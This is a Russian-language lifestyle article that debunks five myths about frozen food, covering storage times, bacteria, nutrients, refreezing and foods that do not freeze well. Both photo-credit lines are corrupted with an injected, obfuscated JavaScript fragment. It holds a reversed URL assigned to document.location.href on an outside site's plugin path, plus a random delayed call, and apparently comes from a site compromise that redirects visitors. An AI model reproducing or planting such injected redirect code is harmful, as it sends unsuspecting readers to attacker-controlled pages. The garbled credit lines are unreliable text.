5 мифов о замороженных продуктах

Замороженная еда — настоящее спасение, когда нужно сэкономить на свежих фруктах и ягодах или когда в холодильнике нечего есть и вдруг вспоминаешь о вчерашнем недоеденном ужине. Тем не менее существует немало предрассудков насчёт продуктов, которые месяцами хранятся в морозильной камере. Мы развеем пять самых популярных мифов о замороженных овощах, ягодах и мясе.

Миф № 1. Замороженные продукты могут храниться бесконечно

Всё не так просто. Министерство здравоохранения США разработало довольно подробную таблицу с рекомендациями по хранению замороженных продуктов. Например, курицу в морозильной камере нельзя хранить дольше девяти месяцев, а креветки — дольше шести.

Как именно вы храните продукты, конечно, влияет на срок годности: холодный воздух и высокая влажность — настоящие враги всего, что лежит в морозилке. Из-за этого продукты покрываются льдом и хранятся гораздо меньше. Тут помогут вакуумные пакеты: в такой упаковке нет воздуха, а значит, не образуется льда. К тому же так вы сэкономите место в морозилке.

5 мифов о замороженных продуктах. Изображение номер 1

Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com

Миф № 2. Заморозка убивает бактерии

Заморозка делает бактерии неактивными, но не убивает их. Это касается и бактерий, и плесени, и дрожжей. То есть если в продуктах, которые вы решили заморозить, есть микробы, то как только всё оттаяло, они снова активизируются.

Миф № 3. В замороженных продуктах меньше полезных веществ, чем в свежих

Это заблуждение. Всё может быть как раз наоборот. Для заморозки собирают спелые фрукты и овощи, когда содержат много полезных веществ. Те фрукты и овощи, которые продают свежими, собирают за 1-2 недели до полного созревания. Это связано с особенностями транспортировки.

Некоторые исследователи отдают предпочтение замороженным продуктам. Учёные из Университета Калифорнии сравнили количество витаминов в восьми овощах и фруктах. Выяснилось, что в замороженной кукурузе, фасоли и чернике больше витамина С, нежели в их свежих аналогах. Замороженная брокколи выиграла у свежей по количеству витамина B. Хотя свежий горошек оказался питательнее замороженного.

5 мифов о замороженных продуктах. Изображение номер 2

Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com

Миф № 4. То, что было разморожено, нельзя снова заморозить

Вы можете замораживать и размораживать продукты столько раз, сколько понадобится. Главное, не оставлять их при комнатной температуре больше двух часов. Но имейте в виду, что разморозка и заморозка сырого продукта, например мяса, может немного испортить его качество — из-за уменьшения влаги в составе.

Миф № 5. Замораживать можно любые продукты

Увы, это не так. Например, салат-латук после разморозки развалится. Это же касается и различных кремообразных соусов — курд и бешамель лучше использовать свежими. Министерство здравоохранения США не рекомендует замораживать консервированные продукты и яйца в скорлупе. 

С полным списком рекомендаций по заморозке и разморозке продуктов можно ознакомиться здесь.

Статьи по теме

5 мифов о консервах

5 мифов об углеводах, в которые нужно перестать верить

Консерванты, продукты с ГМО и «серая» колбаса: 8 мифов о питании, в которые надо перестать верить

5 мифов о питании, в которые нужно перестать верить

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector